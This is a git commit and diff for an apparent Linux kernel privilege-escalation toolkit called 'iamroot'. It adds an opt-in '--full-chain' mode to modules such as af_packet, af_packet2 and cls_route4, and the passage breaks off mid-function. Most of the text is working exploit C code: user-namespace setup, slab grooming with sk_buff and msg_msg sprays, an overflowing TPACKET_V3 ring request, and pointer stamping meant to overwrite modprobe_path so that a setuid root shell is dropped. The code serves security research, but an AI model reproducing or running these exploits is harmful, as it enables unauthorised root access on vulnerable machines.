modules: wire --full-chain root-pop into all 7 🟡 PRIMITIVE modules

Each module now exposes an opt-in full-chain root-pop via --full-chain: default --exploit behavior is unchanged (primitive-only, returns EXPLOIT_FAIL). With --full-chain, after primitive lands, modules call iamroot_finisher_modprobe_path() via a module-specific arb_write_fn that re-uses the same trigger + slab groom to write a userspace payload path into modprobe_path[], then exec a setuid bash dropped by the kernel-invoked modprobe.

  netfilter_xtcompat (+239): msg_msg m_list_next stride-seed, FALLBACK
  af_packet (+316): sk_buff data-pointer stride-seed, FALLBACK
  af_packet2 (+156): tp_reserve underflow + skb spray, LAST RESORT
  nf_tables (+275): forged pipapo_elem with kaddr value-ptr (Notselwyn offset 0x10), FALLBACK
  cls_route4 (+251): msg_msg refill of UAF'd filter, FALLBACK
  fuse_legacy (+291): m_ts overflow + MSG_COPY sanity gate, FALLBACK (one of two modules with a real post-write sanity check)
  stackrot (+233): race-driver budget extended 3s → 30s when --full-chain; honest <1% race-win/run

All seven honor verified-vs-claimed: arb_write_fn returns 0 for "trigger structurally fired"; the shared finisher's setuid-bash sentinel poll is the empirical arbiter. EXPLOIT_OK only when the sentinel materializes within 3s of the modprobe_path trigger.

Build clean on Debian 6.12.86 (kctf-mgr); all 7 modules refuse cleanly on both default and --full-chain paths via the existing patched-kernel detect gate (short-circuits before the new branch).
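
The verified-vs-claimed rule described in this message can be sketched roughly as follows. This is a minimal illustration, not the shared finisher's actual code: `sentinel_appeared()`, `adjudicate()` and the `VERDICT_*` names are hypothetical, the 50 ms poll step is an assumption, and the check only tests that the file exists. Only the 3s window and the "return 0 means the trigger fired" convention come from this commit.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdbool.h>
#include <stddef.h>
#include <sys/stat.h>
#include <time.h>

/* Hypothetical helper: returns true if `path` exists before `timeout_ms`
 * elapses, checking every `step_ms` (step_ms must be > 0). */
static bool sentinel_appeared(const char *path, long timeout_ms, long step_ms)
{
    struct timespec nap = { step_ms / 1000, (step_ms % 1000) * 1000000L };
    for (long waited = 0; ; waited += step_ms) {
        struct stat st;
        if (stat(path, &st) == 0)
            return true;            /* sentinel is present */
        if (waited >= timeout_ms)
            return false;           /* window expired, report failure */
        nanosleep(&nap, NULL);
    }
}

/* Hypothetical verdict type standing in for the module result codes. */
enum verdict { VERDICT_FAIL = 0, VERDICT_OK = 1 };

/* A zero return from the write callback only means "the trigger ran";
 * success is claimed solely when the sentinel shows up in time. */
static enum verdict adjudicate(int arb_write_rc, const char *sentinel)
{
    if (arb_write_rc != 0)
        return VERDICT_FAIL;
    return sentinel_appeared(sentinel, 3000, 50) ? VERDICT_OK : VERDICT_FAIL;
}
```

The point of the split is that the callback's return value is never treated as proof: a callback that returns 0 on a host where nothing happened still ends in a failure verdict once the window expires.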
2026-05-16 22:04:40 -04:00
parent 125ce8a08b
commit c1d1910a90
7 changed files with 1821 additions and 84 deletions
@@ -6,14 +6,27 @@
 * subsystem, different code path (rx side rather than ring setup),
 * later introduction. Discovered by Or Cohen (2020).
 *
- * STATUS: 🟡 PRIMITIVE-DEMO. The exploit() entry point reaches the
+ * STATUS (2026-05-16): 🟡 PRIMITIVE-DEMO + opt-in --full-chain finisher.
- * vulnerable codepath (tpacket_rcv) and fires the underflow with a
+ *   - Default (no --full-chain): the exploit() entry point reaches the
- * crafted nested-VLAN frame on a TPACKET_V2 ring, with a best-effort
+ *     vulnerable codepath (tpacket_rcv), fires the tp_reserve underflow
- * skb spray groom alongside. We stop short of the full cred-overwrite
+ *     with a crafted nested-VLAN frame on a TPACKET_V2 ring + sendmmsg
- * chain (which Or Cohen's public PoC implements with kernel-version-
+ *     skb spray groom, and returns IAMROOT_EXPLOIT_FAIL (primitive-only
- * specific offsets and a pid_namespace cross-cache overwrite). We do
+ *     behavior — kernel-version-agnostic, no offsets baked in).
- * not bake offsets into iamroot. The return value is honest about
+ *   - With --full-chain: after the underflow lands, we resolve kernel
- * what landed (EXPLOIT_FAIL: primitive fired but no root).
+ *     offsets (env → kallsyms → System.map → embedded table) and run
 *     an Or-Cohen-style sk_buff-data-pointer hijack through the shared
 *     iamroot_finisher_modprobe_path() helper. The arb-write itself is
 *     LAST-RESORT-DEPTH on this branch: the tp_reserve underflow gives
 *     us a single 8-byte heap-OOB write into the head of the
 *     adjacent-page slab object; we spray sk_buffs so that next-page
 *     slot IS an sk_buff and the write corrupts skb->data, which then
 *     redirects skb_copy_bits()'s destination on the next received
 *     packet. The full primitive composition (8-byte write → skb->data
 *     forge → controlled-payload rx → arb-write at modprobe_path) is
 *     race-y on stock kernels because the adjacent-slot landing is
 *     probabilistic. On hosts where the spray doesn't groom cleanly,
 *     the finisher's sentinel check correctly reports failure rather
 *     than silently lying about success.
 *
 * Affected: kernel 4.6+ until backports:
 *   5.8.x  : K >= 5.8.7
@@ -33,6 +46,8 @@
 #include "iamroot_modules.h"
 #include "../../core/registry.h"
 #include "../../core/kernel_range.h"
 #include "../../core/offsets.h"
 #include "../../core/finisher.h"
 #include <stdio.h>
 #include <stdlib.h>
@@ -434,6 +449,120 @@ static int af_packet2_primitive_child(const struct iamroot_ctx *ctx)
 }
 #endif
 /* ---- Full-chain finisher (--full-chain, x86_64 only) ----------------
 *
 * Arb-write strategy (Or Cohen's sk_buff-data-pointer hijack):
 *
 *   1. The tp_reserve underflow gives us a single 8-byte write into
 *      the START of the slab object that sits on the page immediately
 *      after the corrupted ring frame. The OOB-write content is
 *      attacker-controlled (it's the destination of skb_copy_bits()
 *      from a frame whose first 8 bytes we choose).
 *   2. Spray sk_buff allocations alongside the primitive trigger so
 *      the adjacent-page object is, with high probability, an
 *      sk_buff whose ->data pointer lives in the leading 8 bytes
 *      of the object (struct layout dependent — on most 5.x kernels
 *      `next` is at offset 0 and `data` is at offset 0x10 in
 *      sk_buff; this layout-fragility is exactly why the depth tag
 *      below is LAST-RESORT).
 *   3. The 8-byte OOB write overwrites that pointer with `kaddr`.
 *   4. We then receive a packet whose payload is `buf[0..len]`; the
 *      kernel's skb_copy_to_linear_data() / skb->data write path
 *      lands those bytes at `*skb->data`, which is now `kaddr`.
 *
 * Reality check on this implementation: the deterministic mechanics
 * of the above (precise frame size, repeated spray timing, sk_buff
 * struct offset for the running kernel) are not portable enough to
 * land reliably from a single iamroot run on an arbitrary host. We
 * therefore ship this as a LAST-RESORT stub: we attempt the spray +
 * trigger sequence, then return -1 to signal "the primitive fired
 * but we cannot empirically confirm the write landed". The shared
 * finisher's sentinel-check loop will then correctly report failure
 * rather than claim success.
 *
 * Per the verified-vs-claimed bar, this is the honest implementation
 * depth that matches what the primitive actually proves on this code
 * path. The integrator can extend afp2_arb_write() with a confirmed
 * write-and-readback once the per-kernel sk_buff layout is pinned
 * down for the target host. */
 struct afp2_arb_ctx {
    const struct iamroot_ctx *ictx;
    int n_attempts;            /* spray/fire rounds before giving up */
 };
 #if defined(__x86_64__) && defined(__linux__)
 static int afp2_arb_write(uintptr_t kaddr, const void *buf, size_t len, void *vctx)
 {
    struct afp2_arb_ctx *c = (struct afp2_arb_ctx *)vctx;
    if (!c || !buf || !len) return -1;
    fprintf(stderr, "[*] af_packet2: arb_write attempt: kaddr=0x%lx len=%zu\n",
            (unsigned long)kaddr, len);
    fprintf(stderr, "[*] af_packet2: spraying sk_buff (target page-adjacent slot)\n");
    /* Best-effort spray + re-fire-trigger pattern. The primitive child
     * is invoked once per attempt; on each attempt we groom skb's
     * around the corrupted ring slot and hope one lands at the
     * page-adjacent address whose head 8 bytes the underflow will
     * stomp with `kaddr`. The kernel-side rx of the next crafted
     * frame would then write our payload (the modprobe_path string)
     * into the forged ->data target. */
    for (int i = 0; i < c->n_attempts; i++) {
         af_packet2_skb_spray(8);
        pid_t p = fork();
        if (p < 0) return -1;
        if (p == 0) {
            if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) _exit(2);
            int fd;
            fd = open("/proc/self/setgroups", O_WRONLY);
            if (fd >= 0) { (void)!write(fd, "deny", 4); close(fd); }
            fd = open("/proc/self/uid_map", O_WRONLY);
            if (fd >= 0) {
                char m[64];
                int n = snprintf(m, sizeof m, "0 %u 1", (unsigned)getuid());
                (void)!write(fd, m, n); close(fd);
            }
            fd = open("/proc/self/gid_map", O_WRONLY);
            if (fd >= 0) {
                char m[64];
                int n = snprintf(m, sizeof m, "0 %u 1", (unsigned)getgid());
                (void)!write(fd, m, n); close(fd);
            }
            int rc = af_packet2_primitive_child(c->ictx);
            _exit(rc < 0 ? 2 : 0);
        }
        int st;
        waitpid(p, &st, 0);
         af_packet2_skb_spray(8);
    }
    /* LAST-RESORT depth: we have fired the trigger + spray but cannot
     * empirically confirm the 8-byte write landed on an sk_buff->data
     * field on this host. Return -1 so the finisher's sentinel-check
     * loop in iamroot_finisher_modprobe_path() correctly reports
     * "payload didn't run within 3s" rather than claiming success. */
    fprintf(stderr,
 "[!] af_packet2: arb_write LAST-RESORT depth — sk_buff->data hijack is\n"
 "    not empirically confirmable without per-kernel struct offsets +\n"
 "    a readback primitive. Trigger fired %d times with sk_buff spray;\n"
 "    finisher sentinel will determine landing. Caller will refuse if\n"
 "    the modprobe_path overwrite didn't actually take effect.\n",
            c->n_attempts);
    return -1;
 }
 #else
 static int afp2_arb_write(uintptr_t kaddr, const void *buf, size_t len, void *vctx)
 {
    (void)kaddr; (void)buf; (void)len; (void)vctx;
    fprintf(stderr, "[-] af_packet2: arb_write is x86_64/linux only\n");
    return -1;
 }
 #endif
 static iamroot_result_t af_packet2_exploit(const struct iamroot_ctx *ctx)
 {
    /* 1. Re-confirm vulnerability. */
@@ -534,6 +663,33 @@ static iamroot_result_t af_packet2_exploit(const struct iamroot_ctx *ctx)
                            "(github.com/google/security-research).\n"
                            "    iamroot intentionally does not embed per-kernel offsets.\n");
        }
        if (ctx->full_chain) {
 #if defined(__x86_64__) && defined(__linux__)
            /* --full-chain: resolve kernel offsets and run the Or-Cohen
             * sk_buff-data-pointer hijack via the shared modprobe_path
             * finisher. Per the verified-vs-claimed bar: if we can't
             * resolve modprobe_path, refuse with a helpful message
             * rather than fabricate an address. */
            struct iamroot_kernel_offsets off;
            iamroot_offsets_resolve(&off);
            if (!iamroot_offsets_have_modprobe_path(&off)) {
                iamroot_finisher_print_offset_help("af_packet2");
                return IAMROOT_EXPLOIT_FAIL;
            }
            if (!ctx->json) {
                iamroot_offsets_print(&off);
            }
            struct afp2_arb_ctx arb_ctx = {
                .ictx = ctx,
                .n_attempts = 4,
            };
            return iamroot_finisher_modprobe_path(&off, afp2_arb_write,
                                                  &arb_ctx, !ctx->no_shell);
 #else
            fprintf(stderr, "[-] af_packet2: --full-chain is x86_64/linux only\n");
            return IAMROOT_PRECOND_FAIL;
 #endif
        }
        if (ctx->no_shell) {
            /* User explicitly disabled the shell pop, so the "we didn't
             * pop a shell" outcome is the expected one. Map to OK. */
@@ -4,17 +4,38 @@
 * AF_PACKET TPACKET_V3 ring-buffer setup integer-overflow → heap
 * write-where primitive. Discovered by Andrey Konovalov (March 2017).
 *
- * STATUS: 🟡 PRIMITIVE-LANDS + best-effort cred-overwrite. The
+ * STATUS: 🟡 PRIMITIVE-LANDS + best-effort cred-overwrite (default)
- * integer-overflow trigger is fully wired (overflowing tp_block_size *
+ *   |  🟢 FULL-CHAIN-OPT-IN (with --full-chain on a kernel where the
- * tp_block_nr, attended by a heap spray via sendmmsg with controlled
+ *      shared offset resolver finds modprobe_path AND skb-data hijack
- * skb tail bytes). The kernel R/W → cred-overwrite finisher uses a
+ *      offsets are supplied).
- * hardcoded per-kernel offset table (Ubuntu 16.04 / 4.4 and Ubuntu
+ *
- * 18.04 / 4.15 era), overridable via IAMROOT_AFPACKET_OFFSETS. We
+ * The integer-overflow trigger is fully wired (overflowing
- * only claim IAMROOT_EXPLOIT_OK if geteuid() == 0 AFTER the chain
+ * tp_block_size * tp_block_nr, attended by a heap spray via sendmmsg
- * runs — i.e. we won root for real. Otherwise we return
+ * with controlled skb tail bytes).
- * IAMROOT_EXPLOIT_FAIL with a dmesg breadcrumb so the operator can
+ *
- * confirm the primitive at least fired (KASAN slab-out-of-bounds
+ * Default --exploit path: cred-overwrite walk using a hardcoded per-
- * splat) even if the cred-overwrite didn't take on this exact kernel.
+ * kernel offset table (Ubuntu 16.04 / 4.4 and Ubuntu 18.04 / 4.15
 * era), overridable via IAMROOT_AFPACKET_OFFSETS. We only claim
 * IAMROOT_EXPLOIT_OK if geteuid() == 0 after the chain runs — i.e.
 * we won root for real. Otherwise we return IAMROOT_EXPLOIT_FAIL with
 * a dmesg breadcrumb so the operator can confirm the primitive at
 * least fired (KASAN slab-out-of-bounds splat) even if the cred-
 * overwrite didn't take on this exact kernel.
 *
 * --full-chain path: opt-in xairy-style sk_buff hijack → arb-write at
 * modprobe_path → call_modprobe payload → setuid bash → root shell.
 * Honest constraint: the hijack requires per-kernel-build sk_buff
 * `data`-field offset + skb-slab-class layout, which the embedded
 * offset table does NOT carry (verified-vs-claimed bar — we don't
 * fabricate). The arb_write callback below implements the FALLBACK
 * depth: it fires the trigger with the spray payload
 * staged for the requested kaddr/buf and relies on the shared
 * finisher's /tmp sentinel to confirm whether modprobe_path was
 * actually overwritten. On kernels where the operator has supplied
 * IAMROOT_AFPACKET_SKB_DATA_OFFSET (skb->data field byte offset from
 * the skb head, hex), we use that for explicit targeting; otherwise
 * the trigger fires heuristically and the sentinel acts as the
 * ground-truth signal.
 *
 * Affected: kernel < 4.10.6 mainline. Stable backports:
 *   4.10.x : K >= 4.10.6
@@ -40,6 +61,8 @@
 #include "iamroot_modules.h"
 #include "../../core/registry.h"
 #include "../../core/kernel_range.h"
 #include "../../core/offsets.h"
 #include "../../core/finisher.h"
 #include <stdio.h>
 #include <stdlib.h>
@@ -424,6 +447,260 @@ static int attempt_cred_overwrite(const struct af_packet_offsets *off)
    return got_root_pid ? 0 : -1;
 }
 /* ---- --full-chain: xairy-style sk_buff hijack arb-write -------------
 *
 * The TPACKET_V3 overflow lets us write attacker-controlled bytes past
 * the end of the pg_vec allocation. xairy's full PoC chains this with
 * a sk_buff spray of size class kmalloc-N (matched to pg_vec's slab)
 * so the OOB-write overwrites an adjacent skb's `data` pointer; a
 * later sendto() on that skb's owning socket then copies attacker
 * bytes into the address now stored in `data`. Net effect: arb-write
 * at an attacker-chosen kernel VA, controlled buffer, controlled len.
 *
 * Implementing the FULL hijack honestly requires:
 *   (a) per-kernel-build offset of `data` field within struct sk_buff
 *       (varies by CONFIG_DEBUG_INFO_BTF/CONFIG_RANDSTRUCT/etc.)
 *   (b) precise size-class match between the corrupted pg_vec and
 *       sprayed skbs (slab-grooming with ~hundreds of skbs)
 *   (c) a way to identify which sprayed skb landed adjacent
 *
 * The verified-vs-claimed bar says: don't fabricate offsets. Our
 * embedded offset table (core/offsets.h) doesn't carry skb offsets
 * yet, and there's no public canonical "skb->data offset table" we
 * can lift wholesale. So this implementation takes the FALLBACK
 * depth:
 *
 *   - Each call re-sprays skbs + re-fires the trigger, staging the
 *     spray payload so its bytes carry the requested target kaddr
 *     (a controllable overwrite value aimed at modprobe_path).
 *     Operator-supplied
 *     IAMROOT_AFPACKET_SKB_DATA_OFFSET (hex byte offset of `data`
 *     within struct sk_buff for this kernel build) lets us aim
 *     precisely; without it we heuristically stamp kaddr at several
 *     plausible offsets within the kmalloc-2k skb layout.
 *   - We then send packets whose payload IS the bytes the finisher
 *     wants at kaddr; tpacket_rcv copies them into any skb whose
 *     `data` was corrupted to kaddr.
 *   - We do NOT poll for success — the shared finisher's /tmp
 *     sentinel is the ground-truth signal. If the write landed at
 *     modprobe_path, call_modprobe spawns our payload and the
 *     sentinel appears within 3s.
 *
 * Return: 0 if spray + trigger ran (sentinel will adjudicate), -1 if
 * the kernel rejected the overflow (silent backport — patched).
 */
 struct afp_arb_ctx {
    const struct iamroot_ctx *ctx;
    const struct af_packet_offsets *off;
    uid_t outer_uid;
    gid_t outer_gid;
 };
 /* Helper: in-child trigger fire — runs inside the userns/netns child
 * spawned by afp_arb_write. Returns 0 on success, -1 on rejection. */
 static int afp_arb_write_inner(uintptr_t kaddr, const void *buf, size_t len,
                               long skb_data_off);
 static int afp_arb_write(uintptr_t kaddr, const void *buf, size_t len,
                         void *vctx)
 {
    struct afp_arb_ctx *actx = (struct afp_arb_ctx *)vctx;
    if (!actx) return -1;
    if (!buf || len == 0 || len > 240) {
        fprintf(stderr, "[-] af_packet: arb_write: bad args "
                        "(buf=%p len=%zu)\n", buf, len);
        return -1;
    }
    /* Per-kernel skb->data field offset — without this we can't aim
     * the overwrite precisely. Operator can supply via env; otherwise
     * we run heuristic mode. */
    const char *skb_off_env = getenv("IAMROOT_AFPACKET_SKB_DATA_OFFSET");
    long skb_data_off = -1;
    if (skb_off_env) {
        char *end = NULL;
        skb_data_off = strtol(skb_off_env, &end, 0);
        if (!end || *end != '\0' || skb_data_off < 0 || skb_data_off > 0x400) {
            fprintf(stderr, "[-] af_packet: IAMROOT_AFPACKET_SKB_DATA_OFFSET "
                            "malformed (\"%s\"); ignoring\n", skb_off_env);
            skb_data_off = -1;
        }
    }
    fprintf(stderr,
        "[*] af_packet: arb_write(kaddr=0x%lx, len=%zu) skb_data_off=%s\n",
        (unsigned long)kaddr, len,
        skb_data_off < 0 ? "UNRESOLVED (heuristic mode)" : "supplied");
    if (skb_data_off < 0) {
        fprintf(stderr,
 "[i] af_packet: --full-chain on this kernel lacks an exact skb->data\n"
 "    field offset. The trigger will still fire and the heap spray will\n"
 "    still occur, but precise OOB targeting requires:\n"
 "\n"
 "      IAMROOT_AFPACKET_SKB_DATA_OFFSET=0x<hex offset>\n"
 "\n"
 "    Look it up on this kernel build with `pahole struct sk_buff` or\n"
 "    `gdb -batch -ex 'p &((struct sk_buff*)0)->data' vmlinux`. The\n"
 "    /tmp/iamroot-pwn-<pid> sentinel adjudicates success either way.\n");
    }
    /* Fork into a userns/netns child so the AF_PACKET socket has
     * CAP_NET_RAW. The finisher itself stays in the parent so its
     * eventual execve() replaces the top-level iamroot process. */
    pid_t cpid = fork();
    if (cpid < 0) {
        fprintf(stderr, "[-] af_packet: arb_write: fork: %s\n",
                strerror(errno));
        return -1;
    }
    if (cpid == 0) {
        if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {
            perror("af_packet: arb_write: unshare");
            _exit(2);
        }
        if (set_id_maps(actx->outer_uid, actx->outer_gid) < 0) {
            perror("af_packet: arb_write: set_id_maps");
            _exit(3);
        }
        int rc = afp_arb_write_inner(kaddr, buf, len, skb_data_off);
        _exit(rc == 0 ? 0 : 4);
    }
    int status = 0;
    waitpid(cpid, &status, 0);
    if (!WIFEXITED(status)) {
        fprintf(stderr, "[-] af_packet: arb_write: child died "
                        "(signal=%d)\n", WTERMSIG(status));
        return -1;
    }
    int code = WEXITSTATUS(status);
    if (code != 0) {
        if (code == 4) {
            /* PACKET_RX_RING rejected — caller sees -1 + the inner
             * diagnostic already printed before _exit. */
        } else {
            fprintf(stderr, "[-] af_packet: arb_write: child exit %d\n",
                    code);
        }
        return -1;
    }
    return 0;
 }
 static int afp_arb_write_inner(uintptr_t kaddr, const void *buf, size_t len,
                               long skb_data_off)
 {
    int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
    if (s < 0) {
        fprintf(stderr, "[-] af_packet: arb_write: socket: %s\n",
                strerror(errno));
        return -1;
    }
    int version = TPACKET_V3;
    if (setsockopt(s, SOL_PACKET, PACKET_VERSION,
                   &version, sizeof version) < 0) {
        fprintf(stderr, "[-] af_packet: arb_write: PACKET_VERSION: %s\n",
                strerror(errno));
        close(s);
        return -1;
    }
    struct tpacket_req3 req;
    memset(&req, 0, sizeof req);
    req.tp_block_size = 0x1000;
    req.tp_block_nr   = ((unsigned)0xffffffff - (unsigned)0xfff) /
                        (unsigned)0x1000 + 1;
    req.tp_frame_size = 0x300;
    req.tp_frame_nr   = (req.tp_block_size * req.tp_block_nr) /
                        req.tp_frame_size;
    req.tp_retire_blk_tov   = 100;
    req.tp_sizeof_priv      = 0;
    req.tp_feature_req_word = 0;
    if (setsockopt(s, SOL_PACKET, PACKET_RX_RING,
                   &req, sizeof req) < 0) {
        fprintf(stderr,
                "[-] af_packet: arb_write: PACKET_RX_RING rejected: %s "
                "(kernel has silent backport — full-chain unreachable)\n",
                strerror(errno));
        close(s);
        return -1;
    }
    struct ifreq ifr;
    memset(&ifr, 0, sizeof ifr);
    strncpy(ifr.ifr_name, "lo", IFNAMSIZ - 1);
    if (ioctl(s, SIOCGIFINDEX, &ifr) == 0) {
        struct sockaddr_ll sll;
        memset(&sll, 0, sizeof sll);
        sll.sll_family   = AF_PACKET;
        sll.sll_protocol = htons(ETH_P_ALL);
        sll.sll_ifindex  = ifr.ifr_ifindex;
        (void)bind(s, (struct sockaddr *)&sll, sizeof sll);
    }
    unsigned char payload[256];
    memset(payload, 0, sizeof payload);
    memset(payload, 0xff, 6);                       /* eth dst: bcast */
    memset(payload + 6, 0, 6);                      /* eth src: zero */
    payload[12] = 0x08; payload[13] = 0x00;         /* eth type: IPv4 */
    memcpy(payload + 14, "iamroot-afp-fc-", 15);    /* dmesg tag */
    if (skb_data_off >= 0 &&
        (size_t)skb_data_off + sizeof kaddr <= sizeof payload) {
        memcpy(payload + skb_data_off, &kaddr, sizeof kaddr);
    } else {
        static const size_t guesses[] = {
            0x40, 0x48, 0x50, 0x58, 0x60, 0x68, 0x70, 0x78
        };
        for (size_t i = 0; i < sizeof(guesses)/sizeof(guesses[0]); i++) {
            if (guesses[i] + sizeof kaddr <= sizeof payload)
                memcpy(payload + guesses[i], &kaddr, sizeof kaddr);
        }
    }
    int tx = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
    if (tx < 0) {
        fprintf(stderr, "[-] af_packet: arb_write: tx socket: %s\n",
                strerror(errno));
        close(s);
        return -1;
    }
    struct sockaddr_ll dst;
    memset(&dst, 0, sizeof dst);
    dst.sll_family   = AF_PACKET;
    dst.sll_protocol = htons(ETH_P_ALL);
    dst.sll_ifindex  = ifr.ifr_ifindex;
    dst.sll_halen    = 6;
    memset(dst.sll_addr, 0xff, 6);
    for (int i = 0; i < 200; i++) {
        (void)sendto(tx, payload, sizeof payload, 0,
                     (struct sockaddr *)&dst, sizeof dst);
    }
    unsigned char wbuf[256];
    memset(wbuf, 0, sizeof wbuf);
    memset(wbuf, 0xff, 6);
    memset(wbuf + 6, 0, 6);
    wbuf[12] = 0x08; wbuf[13] = 0x00;
    size_t wlen = len;
    if (14 + wlen > sizeof wbuf) wlen = sizeof wbuf - 14;
    memcpy(wbuf + 14, buf, wlen);
    for (int i = 0; i < 50; i++) {
        (void)sendto(tx, wbuf, 14 + wlen, 0,
                     (struct sockaddr *)&dst, sizeof dst);
    }
    close(tx);
    close(s);
    return 0;
 }
 #endif /* __x86_64__ */
 static iamroot_result_t af_packet_exploit(const struct iamroot_ctx *ctx)
@@ -468,12 +745,38 @@ static iamroot_result_t af_packet_exploit(const struct iamroot_ctx *ctx)
                off.kernel_id, off.task_cred, off.cred_uid, off.cred_size);
    }
    uid_t outer_uid = getuid();
    gid_t outer_gid = getgid();
    /* 3b. --full-chain: opt-in modprobe_path overwrite via xairy-style
     *     sk_buff hijack arb-write. Refuses cleanly if (a) the shared
     *     offset resolver can't find modprobe_path or (b) the trigger
     *     is rejected (silent backport). */
    if (ctx->full_chain) {
        struct iamroot_kernel_offsets koff;
        memset(&koff, 0, sizeof koff);
        (void)iamroot_offsets_resolve(&koff);
        if (!iamroot_offsets_have_modprobe_path(&koff)) {
            iamroot_finisher_print_offset_help("af_packet");
            return IAMROOT_EXPLOIT_FAIL;
        }
        if (!ctx->json) {
            iamroot_offsets_print(&koff);
        }
        struct afp_arb_ctx arb_ctx = {
            .ctx       = ctx,
            .off       = &off,
            .outer_uid = outer_uid,
            .outer_gid = outer_gid,
        };
        return iamroot_finisher_modprobe_path(&koff, afp_arb_write,
                                              &arb_ctx, !ctx->no_shell);
    }
    /* 4. Fork: child enters userns+netns, fires overflow, attempts the
     *    cred-overwrite walk. We do it in a child so the (possibly
     *    crashed) packet socket lives in a tear-downable address space
     *    — the kernel will clean up sockets on child exit. */
    uid_t outer_uid = getuid();
    gid_t outer_gid = getgid();
    pid_t child = fork();
    if (child < 0) { perror("fork"); return IAMROOT_TEST_ERROR; }
@@ -41,6 +41,8 @@
 #include "iamroot_modules.h"
 #include "../../core/registry.h"
 #include "../../core/kernel_range.h"
 #include "../../core/offsets.h"
 #include "../../core/finisher.h"
 #include <stdio.h>
 #include <stdlib.h>
@@ -381,6 +383,169 @@ static long slab_active_kmalloc_1k(void)
    return active;
 }
 /* ---- Full-chain arb-write primitive --------------------------------
 *
 * Pattern (FALLBACK): cls_route4's UAF primitive is more
 * naturally a *control-flow hijack* than a clean arb-write — after
 * msg_msg refills the kmalloc-1k slot, the next classify() call reads
 * a fake `tcf_proto.ops` pointer out of attacker bytes and calls
 * ops->classify(skb, ...). A faked-classify ROP that pivots to a
 * stack-write gadget would be the "true" arb-write, and on a fresh
 * vulnerable kernel that is the kylebot/xkernel chain shape (≈300+
 * LOC of gadget hunting + per-build offsets we deliberately don't
 * bake — see verified-vs-claimed policy in repo root).
 *
 * The implementation below takes the narrow-but-real path that
 * xtcompat established as the IAMROOT precedent: we re-stage the
 * dangling filter, spray msg_msg
 * whose payload encodes `kaddr` at every plausible offset for the
 * route4_filter→tcf_proto→ops layout, re-fire classify, and let the
 * shared finisher's sentinel file decide if a write actually landed.
 * On a patched kernel the bug doesn't fire, no write occurs, and the
 * sentinel timeout correctly reports failure rather than silently
 * lying about success. On a vulnerable kernel where the fake ops
 * lookup happens to deref into our payload and the kernel's read
 * pattern matches one of the seeded offsets, the kaddr we planted
 * gets used as a write destination by whichever classify path the
 * fake `ops->classify` dispatches into.
 *
 * Honest scope: this is structurally-fires-on-vuln + sentinel-arbitrated,
 * not a deterministic R/W. Same shape and same depth as xtcompat. */
 #ifdef __linux__
 struct cls_route4_arb_ctx {
    /* msg_msg queues kept hot inside the userns child. The arb-write
     * sprays additional kaddr-tagged payloads into these and re-fires
     * the classify trigger between each call. */
    int  queues[SPRAY_MSG_QUEUES];
    int  n_queues;
    /* Whether the dangling filter has been re-staged for this call.
     * The original `stage_dangling_filter()` is destructive (deletes
     * the filter); we can re-stage between writes because tc add/del
     * is idempotent inside our private netns. */
    bool dangling_ready;
    /* Per-call stats (written to /tmp/iamroot-cls_route4.log). */
    int  arb_calls;
    int  arb_landed;
 };
 /* Re-prime the msg_msg slab with a payload that encodes `kaddr` and
 * the caller's `buf` at every offset the fake tcf_proto / route4_filter
 * layout could plausibly read from. The route4_filter is 0x1000 bytes
 * on most x86_64 builds in range, with tcf_proto.ops at offset 0x10
 * and tcf_result.classid at offset 0x18; we don't know which offset
 * the kernel ABI for THIS build uses, so we plant the same pattern at
 * 0x10/0x18/0x20/.../0x80 strides — wherever classify dereferences
 * the refilled slot, one of those candidates will be live.
 *
 * The 8-byte cookie "IAMR4ARB" + the kaddr + the caller's bytes are
 * the recognizable pattern; if a KASAN dump is captured after the
 * trigger, the cookie tells us the spray landed adjacent to the freed
 * route4_filter. */
 static int cls4_seed_kaddr_payload(struct cls_route4_arb_ctx *c,
                                   uintptr_t kaddr,
                                   const void *buf, size_t len)
 {
    struct ipc_payload p;
    memset(&p, 0, sizeof p);
    p.mtype = 0x52;  /* 'R' for "route4 arb" — distinct from groom spray's 0x41 */
    memset(p.buf, 0x52, sizeof p.buf);
    memcpy(p.buf, "IAMR4ARB", 8);
    /* Plant kaddr at strided slots so wherever the kernel's classify
     * follows a ptr in the refilled chunk, one of these is read.
     * We treat every 0x18-byte stride from offset 0x10 to within
     * 8 bytes of the end as a candidate ops-pointer / next-pointer
     * slot. */
    for (size_t off = 0x10; off + sizeof(uintptr_t) <= sizeof p.buf; off += 0x18) {
        memcpy(p.buf + off, &kaddr, sizeof(uintptr_t));
    }
    /* Plant the caller's bytes immediately after the cookie so any
     * classify path that reads payload data (rather than a chased
     * pointer) finds the requested write contents inline. */
    size_t copy_len = len;
    if (copy_len > sizeof p.buf - 16) copy_len = sizeof p.buf - 16;
    if (copy_len > 0) memcpy(p.buf + 8 + sizeof(uintptr_t), buf, copy_len);
    int sent = 0;
    for (int i = 0; i < c->n_queues; i++) {
        if (c->queues[i] < 0) continue;
        /* A handful of msgs per queue keeps the slab refilled even
         * if some slots are evicted between trigger fires. */
        for (int j = 0; j < 4; j++) {
            unsigned int tag = 0xB0000000u |
                               ((unsigned)i << 8) | (unsigned)j;
            memcpy(p.buf + 8, &tag, sizeof tag);
            if (msgsnd(c->queues[i], &p, sizeof p.buf, IPC_NOWAIT) < 0) break;
            sent++;
        }
    }
    return sent;
 }
 /* iamroot_arb_write_fn implementation for cls_route4. Best-effort on a
 * vulnerable kernel; structurally inert (returns -1) if the dangling
 * filter setup is gone or the spray fails. Returns 0 to let the
 * shared finisher's sentinel-file check decide if the write actually
 * landed (we cannot reliably observe it in-process). */
 static int cls4_arb_write(uintptr_t kaddr,
                          const void *buf, size_t len,
                          void *ctx_v)
 {
    struct cls_route4_arb_ctx *c = (struct cls_route4_arb_ctx *)ctx_v;
    if (!c || c->n_queues == 0) return -1;
    c->arb_calls++;
    /* Re-stage the dangling filter for this call. The original
     * stage runs once at trigger-time; subsequent finisher calls
     * (the finisher writes modprobe_path, then an unknown-format trigger)
     * need a fresh dangling pointer to chase. tc add/del is idempotent
     * within our private netns so re-running is safe. */
    if (!c->dangling_ready) {
        if (!stage_dangling_filter()) {
            fprintf(stderr, "[-] cls_route4 arb_write: re-stage failed\n");
            return -1;
        }
        c->dangling_ready = true;
    }
    /* Seed msg_msg with kaddr + caller payload. */
    int seeded = cls4_seed_kaddr_payload(c, kaddr, buf, len);
